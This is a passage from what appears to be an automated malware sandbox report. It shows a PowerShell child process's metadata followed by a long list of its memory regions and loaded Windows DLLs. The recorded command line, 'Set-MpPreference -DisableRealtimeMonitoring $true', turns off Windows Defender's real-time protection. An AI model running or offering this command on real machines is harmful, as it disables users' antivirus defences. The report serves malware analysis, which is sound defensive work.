"0x9c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x558" cmd_line = "powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3423 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3424 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3425 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3426 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3427 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3428 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3429 start_va = 0x200000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3430 start_va = 0x21fb0000 end_va = 0x22021fff entry_point = 0x21fb0000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 3431 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3432 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3433 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3434 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3435 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3436 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3437 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3438 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3439 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3440 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3441 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3442 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3443 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3444 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3445 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3446 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3447 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3448 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3449 start_va = 0x75440000 end_va = 0x75489fff entry_point = 0x75440000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 3450 start_va = 0x75490000 end_va = 0x754a3fff entry_point = 0x75490000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 3451 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3452 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3453 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3454 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3455 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3456 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3457 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3458 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3459 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3460 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3461 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3462 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3463 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3464 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3465 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3466 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 3467 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 3468 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3469 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3470 start_va = 0x3e0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 3471 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3472 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3473 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3474 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3475 start_va = 0x80000 end_va = 0x82fff entry_point = 0x80000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 3476 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3477 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3478 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 3479 start_va = 0x5a0000 end_va = 0x720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3480 start_va = 0x730000 end_va = 0x1b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3481 start_va = 0x1b60000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 3482 start_va = 0x1c90000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 3483 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3484 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3485 start_va = 0x1ba0000 end_va = 0x1c7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ba0000" filename = "" Region: id = 3486 start_va = 0x76040000 end_va = 0x760c2fff entry_point = 0x76040000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3487 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3488 start_va = 0x754c0000 end_va = 0x754d6fff entry_point = 0x754c0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 3489 start_va = 0x75950000 end_va = 0x7595afff entry_point = 0x75950000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3490 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3491 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 3492 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 3493 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 3494 start_va = 0x1ca0000 end_va = 0x1f6efff entry_point = 0x1ca0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3495 start_va = 0x1f70000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 3496 start_va = 0x2070000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 3497 start_va = 0x74dd0000 end_va = 0x74ec4fff entry_point = 0x74dd0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 3498 start_va = 0x74ed0000 end_va = 0x7506dfff entry_point = 0x74ed0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 3499 start_va = 0x75410000 end_va = 0x75430fff entry_point = 0x75410000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 3500 start_va = 0x76530000 end_va = 0x76574fff entry_point = 0x76530000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 3501 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 3502 start_va = 0x2c0000 end_va = 0x2dffff entry_point = 0x2c0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 3503 start_va = 0x570000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 3504 start_va = 0x20b0000 end_va = 0x24a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 3505 start_va = 0x75f20000 end_va = 0x75f31fff entry_point = 0x75f20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 3506 start_va = 0x76580000 end_va = 0x7671cfff entry_point = 0x76580000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 3507 start_va = 0x77750000 end_va = 0x77776fff entry_point = 0x77750000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3508 start_va = 0x2030000 end_va = 0x206ffff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 3509 start_va = 0x24b0000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 3510 start_va = 0x2640000 end_va = 0x267ffff entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 3511 start_va = 0x75090000 end_va = 0x750bdfff entry_point = 0x75090000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 3512 start_va = 0x753c0000 end_va = 0x7540bfff entry_point = 0x753c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3513 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3514 start_va = 0x75370000 end_va = 0x75378fff entry_point = 0x75370000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 3515 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x2b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3516 start_va = 0x580000 end_va = 0x583fff entry_point = 0x580000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3517 start_va = 0x1b30000 end_va = 0x1b5ffff entry_point = 0x1b30000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 3518 start_va = 0x1fb0000 end_va = 0x2015fff entry_point = 0x1fb0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 3519 start_va = 0x74d60000 end_va = 0x74dcffff entry_point = 0x74d60000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 3520 start_va = 0x75350000 end_va = 0x75368fff entry_point = 0x75350000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3521 start_va = 0x26e0000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 3522 start_va = 0x2760000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 3523 start_va = 0x74d50000 end_va = 0x74d5afff entry_point = 0x74d50000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 3524 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3525 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 3526 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3527 start_va = 0x75520000 end_va = 0x75535fff entry_point = 0x75520000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3528 start_va = 0x74cc0000 end_va = 0x74d37fff entry_point = 0x74cc0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 3529 start_va = 0x753b0000 end_va = 0x753b8fff entry_point = 0x753b0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3530 start_va = 0x1c80000 end_va = 0x1c80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 3531 start_va = 0x2860000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 3532 start_va = 0x28d0000 end_va = 0x290ffff entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 3533 start_va = 0x74670000 end_va = 0x7470afff entry_point = 0x74670000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 3534 start_va = 0x74710000 end_va = 0x74cbafff entry_point = 0x74710000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 3535 start_va = 0x2020000 end_va = 0x2020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 3536 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 3537 start_va = 0x25c0000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 3538 start_va = 0x25d0000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 3539 start_va = 0x25e0000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 3540 start_va = 0x25f0000 end_va = 0x25fffff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 3541 start_va = 0x2600000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 3542 start_va = 0x2610000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 3543 start_va = 0x2680000 end_va = 0x26bffff entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 3544 start_va = 0x27b0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 3545 start_va = 0x2910000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 3546 start_va = 0x4910000 end_va = 0x49affff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 3547 start_va = 0x49b0000 end_va = 0x49effff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 3548 start_va = 0x4ad0000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 3549 start_va = 0x732f0000 end_va = 0x73de7fff entry_point = 0x732f0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 3550 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 3551 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 3561 start_va = 0x2620000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 3562 start_va = 0x4b10000 end_va = 0x4df1fff entry_point = 0x4b10000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3563 start_va = 0x72b50000 end_va = 0x732ebfff entry_point = 0x72b50000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 3564 start_va = 0x75120000 end_va = 0x751a0fff entry_point = 0x75120000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll") Region: id = 3565 start_va = 0x71fe0000 end_va = 0x72859fff entry_point = 0x71fe0000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll") Region: id = 3566 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3567 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3568 start_va = 0x2630000 end_va = 0x2632fff entry_point = 0x2630000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 3569 start_va = 0x49f0000 end_va = 0x4aaffff entry_point = 0x49f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3570 start_va = 0x75f90000 end_va = 0x75f94fff entry_point = 0x75f90000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 3571 